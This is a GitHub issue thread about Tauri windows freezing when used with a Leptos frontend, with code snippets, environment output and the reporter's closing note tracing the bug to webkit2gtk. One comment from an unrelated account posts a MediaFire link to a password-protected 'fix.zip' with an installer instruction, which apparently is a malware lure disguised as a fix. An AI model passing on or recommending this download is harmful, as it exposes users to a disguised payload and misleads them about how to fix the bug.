### ISSUE TITLE
[bug] Tauri window freezing when using Leptos

### ISSUE THREAD

**Issue by frnsys** [tauri-apps/tauri#10783]
### Describe the bug

Basically the window will open but will be unresponsive. The context menu won't show up and the window won't repaint. I've been struggling with this for the last few hours and can't narrow down a cause.

If I run the Leptos (CSR) frontend on its own (`trunk serve`) and visit the page in my browser everything works fine, and I see no errors in the JS console. I do see this warning:

```
using deprecated parameters for the initialization function; pass a single object instead
```

I've found this occur even with the default Leptos app created using `yarn create tauri-app`.

Here I can get the window to not freeze by changing the frontend's main function from:

```rust
fn main() {
    console_error_panic_hook::set_once();
    mount_to_body(|| {
        view! {
            <App/>
        }
    })
}
```

to

```rust
fn main() {
    console_error_panic_hook::set_once();
    mount_to_body(|| {
        view! {
            "hello world"
        }
    })
}
```

i.e. render a string instead of a Leptos component.

However if I change the `App` component to just be:

```rust
#[component]
pub fn App() -> impl IntoView {
    view! {
        "hello world"
    }
}
```

and restore the original main function, it freezes again.

Edit: I've tried with the 2.0 RC and have the same problem.

### Reproduction

Create a Leptos app using `yarn create tauri-app` and then run `cargo tauri dev`.

### Full `tauri info` output

```text
[✔] Environment
    - OS: openSUSE 20240823.0.0 X64
    ✔ webkit2gtk-4.0: 2.44.3
    ✔ rsvg2: 2.58.3
    ✔ rustc: 1.80.1 (3f5fd8dd4 2024-08-06)
    ✔ cargo: 1.80.1 (376290515 2024-07-16)
    ✔ rustup: 1.27.1 (54dd3d00f 2024-04-24)
    ✔ Rust toolchain: stable-x86_64-unknown-linux-gnu (environment override by RUSTUP_TOOLCHAIN)
    - node: 20.12.2
    - yarn: 1.22.22
    - npm: 10.5.0

[-] Packages
    - tauri [RUST]: 1.7.2
    - tauri-build [RUST]: 1.5.4
    - wry [RUST]: 0.24.10
    - tao [RUST]: 0.16.9
    - tauri-cli [RUST]: 1.6.1
    - @tauri-apps/api : not installed!
    - @tauri-apps/cli [NPM]: 1.6.1

[-] App
    - build-type: bundle
    - CSP: unset
    - distDir: ../dist
    - devPath: http://localhost:1420/
```

For Tauri 2:

```
[✔] Environment
    - OS: openSUSE 20240823.0.0 X64
    ✔ webkit2gtk-4.1: 2.44.3
    ✔ rsvg2: 2.58.3
    ✔ rustc: 1.82.0-nightly (c6db1ca3c 2024-08-25)
    ✔ cargo: 1.82.0-nightly (8f40fc59f 2024-08-21)
    ✔ rustup: 1.27.1 (54dd3d00f 2024-04-24)
    ✔ Rust toolchain: nightly-x86_64-unknown-linux-gnu (environment override by RUSTUP_TOOLCHAIN)
    - node: 20.12.2
    - yarn: 1.22.22
    - npm: 10.5.0

[-] Packages
    - tauri [RUST]: 2.0.0-rc.6
    - tauri-build [RUST]: 2.0.0-rc.6
    - wry [RUST]: 0.42.0
    - tao [RUST]: 0.29.1
    - tauri-cli [RUST]: 2.0.0-rc.7

[-] App
    - build-type: bundle
    - CSP: unset
    - frontendDist: ../dist
    - devUrl: http://localhost:1420/
```

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by frnsys** [comment]
After a lot more digging this looks like the same problem as #10626, so I'll close it as a duplicate.

I found these links helpful; it looks like the problem maybe fixed with webkit2gtk 2.44.3-3:
- <https://gitlab.archlinux.org/archlinux/packaging/packages/webkit2gtk-4.1/-/issues/1>
- <https://gitlab.archlinux.org/archlinux/packaging/packages/webkit2gtk/-/commit/ba891a990f63c2cde0d9b7c72e8fc1acf24e57e4>
